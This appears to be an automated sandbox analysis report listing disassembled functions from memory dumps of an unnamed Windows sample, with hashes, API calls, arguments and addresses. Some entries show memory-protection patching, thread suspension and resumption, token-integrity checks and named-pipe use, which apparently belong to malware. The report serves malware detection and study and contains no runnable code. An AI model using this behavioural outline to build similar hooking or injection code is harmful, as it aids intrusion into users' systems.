  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
